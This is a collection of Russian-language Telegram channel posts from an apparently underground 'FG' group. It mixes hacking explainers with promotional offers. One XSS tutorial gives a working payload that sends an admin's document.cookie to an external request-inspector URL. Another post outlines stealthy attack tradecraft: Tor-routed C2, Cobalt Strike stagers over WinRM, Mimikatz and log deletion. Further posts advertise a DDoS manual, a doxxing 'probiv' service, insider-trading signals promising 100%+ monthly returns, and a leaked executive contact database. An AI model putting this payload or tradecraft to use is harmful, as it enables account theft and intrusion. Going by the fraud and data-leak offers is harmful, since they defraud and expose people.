💻Пути без кавычек .

Эта уязвимость часто встречается, и не все разработчики знают про такую особенность ОС Windows (и потому не обращают на это внимания): если у сервиса или шедульной таски путь к исполняемому файлу содержит пробелы и не взят в кавычки (например, C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe), то при его запуске система будет спотыкаться на пробелах. Дойдет до первого, подставит .exe в конце, проверит, есть ли по получившемуся пути такой исполняемый файл. Если его не найдет, пойдет дальше.

🗂На конкретном примере это выглядит так:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program.exe
C:\Program Files (x86)\Program Folder\A.exe
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

Уязвимость заключается в том, что если у непривилегированного пользователя есть права на запись по одному из этих путей, то, положив в него свой исполняемый файл с соответствующим названием (например, C:\Program Files (x86)\Program Folder\A.exe), он может добиться его запуска. Поскольку обычно сервисы запускаются под локальным админом или под Local System (аккаунт, который представляет саму ОС), таким образом злоумышленник легко повышает свои привилегии.

Такие вещи необходимо в первую очередь отслеживать у сервисов и schedule-ных тасок, которые запускают продукт. Надо быть аккуратными с директорией ProgramData. Как правило, в этой директории программы хранят свои данные, но туда могут писать и простые пользователи. Если в ProgramData появляется папка с пробелом, ее можно проэксплуатировать. В итоге всегда брать путь в кавычки — это хорошая практика.
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️ https://news.1rj.ru/str/FG_FAQ_FG/93
⚫️
⚫️
⚫️⚫️⚫️⚫️⚫️⚫️⚫️
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

💻27 августа, Линус Торвальдс представил свежую версию ядра операционной системы Linux за номером 6.5

Одно из главных нововведений - включение по умолчанию функции P-State EPP для некоторых процессоров AMD, что позволяет максимально эффективно управлять ядрами и найти оптимальный баланс между производительностью и энергоэффективностью. Аналогичное обновление получили и процессоры семейства Intel Alder Lake .

⭐️А также:
- По умолчанию теперь включена и функция AMD FreeSync Video
- Поддержка USB4 v2 и Wi-Fi 7, поддержка контроллеров Intel Barlow Ridge и новых систем AMD Ryzen.
- Поддержка драйвера ядра MIDI 2.0 и оптимизировали код драйвера мыши/клавиатуры PS/2.

Очень интересно, что добавили поддержку чипов Qualcomm Adreno 690 и нескольких новых соков Arm и китайских процов Xuantie 910 TH1520 на RISC-V.

💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

⚙️ Полезнейшее меню .

😎FLUFFY GANG - FUTURE GANG - о том кто мы такие и какие цели преследуем.

🗂 Обучающая информация - Познай крипту с нуля:
😐История блокчейна😐История криптовалюты😐Что такое криптовалюта😐Что такое трейдинг😐Полезные сервисы😐Что такое Airdrop Airdrop guide😐Мультиаккаунты для абуза😐Список важных терминов

🕯 Каких результатов мы достигли за пол года тестирования направления трейдинг тематики

╔=====================╗
Мы гораздо интереснее чем кажется на первый взгляд, смотрите каков наш путь.
╚=====================╝


🌟🌟🌟LVL 1 GANG 👆CLICK
➥Наш мега-форум, все сопричастны к идее воплощения будущего в реальность. Тут вы начнёте знакомство с вселенной FG. Вы определенно осознаете силу знаний и сможете обрести желаемое.


🌟🌟🌟LVL 2 PHOENIX 👆CLICK
➥Уровень который требует должной подготовки и навыки командной работы. Активные направления: CRYPTO / IT FINTECH / CLASSIC COMMERCE / 3D & DESIGN / MUSIC EDITOR / GUIDE LINE / NETWORKING - позволяют обрести новые уникальнейшие возможности.


🌟🌟🌟LVL 3 ILLUMINATI👆CLICK
➥Знать многие исходы заранее, умение манипулировать и вести дела в масштабах государства будут доступны по достижении LVL 3. / Первое появление ILLUMINATI в FG TRADE


🌟🌟🌟LVL 4 MCDXL 👆CLICK
➥Здесь исключительно профессионалы, доходят только самые скилловые участники, они показывают выдающиеся результаты на каждом этапе. Масштабные кибератаки на зарубежных злодеев / Выявление схем / Пробивы / Допуски к криптокошелькам и многое другое.


🌟🌟🌟LVL 5 👆CLICK
➥Самый сложный и самый ценный LVL к которому вы можете прийти. Узнать какой масштаб вас ожидает и с кем вы будете работать, только по достижению LVL 4 .


🔝FG TRADE - Это:
⚡️⚡️⚡️⚡️⚡️⚡️
GEMS CHANNEL
FG ARBITRAGE UNION
FG DARK MARKET|FG PROBIV
FG SAINT SIGNALS|FG NEWS DUMP

SOON в разработке: Сервис копи-трейдинга, IT-компания, Крипто-биржа.

📨Обратная связь: @FG_feedback_bot \ @FLUFFYGANG \ @Aixa_feedback_bot

🤕Кибер-атака? Что-то загадочное?


Или хорошо спланированное


😒Тактика скрытности включает:

Управление и контроль TOR
Избегание узлов, контролируемых EDR .
Выжидание подходящего времени и откладывание подозрительных действий для более поздних этапов атаки
Индивидуальный код и хосты соединения для каждой атаки
Техники обфускации, такие как шифрование и загрузка динамической библиотеки
Контркриминалистические методы, такие как удаление файлов журналов

Рассмотрим как пример знакомые механизмы управления и контроля с помощью клиента RDP, работающего через порт 443, маршрутизируемого через TOR. После установки браузера Tor меняется его конфигурация, чтобы он функционировал как постоянная служба, перенаправляя трафик, отправляемый на локальный (динамический) порт с помощью TOR по HTTPS через порт 443. Такие соединения бывают постоянными, поэтому "злоумышленники" могут устанавливать сессии RDP на взломанных хостах и через них, облегчать перемещение внутри сети.

😒Далее идёт Cobalt Strike как вторичный механизм управления и контроля.

Стейджеры (по типу file.exe) сетапятся удаленно на определенных целевых устройствах с использованием WinRM, каждое из которых настроено по-разному, для соединения с выделенным сервером C2 для загрузки Cobalt Strike Beacon.

Инструментарий для работы в среде обычно подразумевает сканирование сети, запуск команд, создание дампов процессов и сбор данных. Типо Mimikatz или Psexec.

Продолжение следует...
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

/ 📀Приглашаем всех желающих к сотрудничеству.

Нужен человек, с хорошим опытом разработки смарт-контрактов и взаимодействия с сетями ETH. Аналогичный опыт работы будет плюсом. Чем больше стэк-сетей тем больше возможностей и доход.


Че там по зп:
5% от объема или 500$+ в день, по выполнению ТЗ.


💬Обратная связь:
@FG_feedback_bot

⚡️MCDXL LVL 4 | NEW LVL | TRADE | DARK | IT

👺Дроворуб-трейдер - герой современности! Его умение рубить дрова и одновременно торговать на бирже - это нечто невероятное. Он сочетает в себе силу природы и умение делать выгодные сделки. (Да-да, это я, сам себя похвалил)


Не спрашивайте каким образом получен допуск к торговой информации, вы и так сами всё знаете.


↪️ Сигналы разделены на три типа в зависимости от частоты их поступления :

🟣Дейтрейдинг
(сигналы которые поступают из наших источников, отобраны аккуратно) - Размер сделки зависит от объема вашего депозита и составляет около 5-7%.


🟣Хайриск
(Преимущественно сигналы поступают от ботов) - сделка составляет примерно 0.5-1% от вашего депозита.


🟣Swing-сделки
(не требует объяснения, все в названии) - N/A


➕ROE: 100%+ в месяц 💸💸💸
(При условии использования 3 стратегий)


✨ Для лучшего результата, мы лично убедимся, что вы разобрались со всеми нюансами торговли по сигналам, разработаем персональный рм и мм соответствующие вашему депозиту.

____________________________

🤒 WORK ⇲


↪️ Что на счет рубки дров, могу предложить вам сотрудничество. Если у вас есть:

🟣Минимальное понимание основ администрирования серверов.

🟣Понимание основных протоколов работы.

🟣Базовые знания html|css если работаете с лендингами.

🟣Понимание основ криптографии.

🟣Умение спуферить данные которые приходят/уходят в вашей работе.

🟣Знания распределения рисков на сделки, что бы не потерять свои деньги.


✨Зачем это нужно? Иначе вы будете брести в полной тьме, даже не понимая, что делаете от слова совсем и вообще. Успех работы зависит для начала ОТ ПОНИМАНИЯ ДЕЙСТВИЙ, КОТОРЫЕ ВЫ ВЫПОЛНЯЕТЕ. И второе КАК ИМЕННО ЭТО ДЕЙСТВИЕ ФУНКЦИОНИРУЕТ.


🧬Хочешь в MCDXL LVL 4 - пиши @drovorub_UI

🧬Хочешь получать инсайд-сигналы, готовь 20 тысяч зеленых и я буду давать информацию за процент из чистой прибыли

🧬 Хочешь всё сразу, но нет ни денег ни знаний, договаривайся с админами через @FG_feedback_bot, но учти что мы тебе не доверяем и твоя задача будет доказать, что ты не сольешь информацию или не сольешься сам в нужный момент.

Улучшения, объяснения, результаты и прочая информация будет постепенно поступать в публичные каналы, благодарю от всей души вселенную FG за предоставленную возможность опубликовать свой оффер, иду рубить дрова.

💬 GANG CHAT
⚙️GUIDE ECOSYSTEM
🗂ADDLIST \ 🔥LVL 2

Вижу есть люди, которые еще не подписаны на FG TRADE, а зря, вот вам информация, а там уже сами решайте что делать 😎

https://news.1rj.ru/str/FG_TRADE/451

💥XSS ИЛИ КАК СПИЗДЕТЬ КУКИ АДМИНА

Ну че вы? Как дела? Седня будем разбираться с ахуительной ошибкой которая есть у всех новичков и самоучек. Веб разработчики готовимся

Не буду ебать вам мозг высерами из википедии объясню на простом примере:

У нас есть Димон - фронтендер и дядя Миша - заказчик
Дядя Миша говорит Димону:
-Бля, захуяч ка мне панельку с отзывами, хочу знач чтоб клиенты могли писать что у меня лучший автосервис
-Ok, boss

Ну и естстественно димон делает всё наотъебись и идёт спать. И тут появляется Дартаньян, ахуенный хакер, решивший спиздеть бд дяди Миши. Заходит знач он на сайт и видит строку с отзывами. В следующую секунду там появляется вот такой вот текст:

<noscript> new Image().src='https://requestinspector.com/inspect/01h0g8ygn7b83t868ka4bncmq8/'+document.cookie; </noscript>

Когда дядя Миша решает проверить что там наворотил Димон, его кукисы отлетают Дартаньяну. Потом с помощью них он залетает в админку, закрепляется на хосте и ворует бд. А что с Димоном? Вместо денег он получает по ебалу.

Итак, думаю все уже поняли в чём заключается XSS, но еще раз поясню. Это когда у пользователя есть возможность ебануть что-то на JS и это исполнится как код на странице.

В моём примере создалось изображение, местоположение которого отсылало на удалённый сервер вместе с кукисами. Я привел лишь базовый пример уязвимости, а так хакер ограничен лишь своим скилом и фантазией.

Окей, а как избежать подобной хуйни?

👉Добавляем CSP header. Например:
Content-Security-Policy: noscript-src 'self'
Более подробно читай тут: https://auth0.com/blog/defending-against-xss-with-csp/

👉Добавляем WAF, его вариаций дохуя, так что загуглите сами. Да и через CSP защититься намного проще, если вы новичёк в вебе забейте хуй на этот пункт. Не упомянуть о вафе я просто не мог))

👉Тестируем абсолютно все поля пользовательского ввода. Можно например туда вставлять этот код:
<noscript>alert('XSS');</noscript>
Есть отстук? Знач нашли уязвимость. Пиздуем фиксить

👉Используем только безопасные функции JS, никаких innerHTML. (ЛГ 💜 СФ )

💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

💀💀50cтраниц про ддос.💀💀

Мануал на достаточно трудном языке - нужно или перечитывать или гуглить, но все, что нужно тут есть. Много теории, настройки, скриптов. Много сказано про методы, софты и серваки, под конец неплохая инф про анонимность, заработок и обход защиты. Я даже пару раз хорошо поржал.
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️ https://news.1rj.ru/str/FG_FAQ_FG/95
⚫️
⚫️
⚫️⚫️⚫️⚫️⚫️⚫️⚫️
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

👑Кто такой Кевин Митник?

Опишите его навыки и историю личности боту.

🔤@FG_feedback_bot

За самый креативный ответ мы предоставим возможность узнать новое из мира социальной инженерии. В пабликах вы такой информации никогда не найдёте. Игра началась 🤝

🆕За базой РУ говорящих тимлидов, CEO и прочих стартаперов с гео кремниевой долины, пишите в фидбек бота с фразой valley.

@FG_feedback_bot

🎁 Нетворкинг и связи которых не найти в открытых источниках, теперь актуальны для истинных ценителей продуктивного сотрудничества.